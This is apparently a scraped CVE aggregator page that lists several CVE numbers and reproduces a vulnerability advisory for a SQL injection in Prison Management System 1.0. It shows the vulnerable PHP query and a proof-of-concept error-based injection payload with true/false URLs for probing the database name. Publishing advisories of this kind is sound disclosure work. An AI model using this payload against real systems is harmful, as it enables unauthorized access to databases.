CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_privilege.php:4

**CVE-2022-32401****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/manage_privilege.php:4

$qry = $conn\->query("SELECT \* FROM \`inmate\_list\` where id = '{$\_GET\['id'\]}'");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='wrong',0,1)%23

Headline

CVE-2022-32401: BugBounty/cve-2022-32401.md at main · Dyrandy/BugBounty

Error Based

CVE: Latest News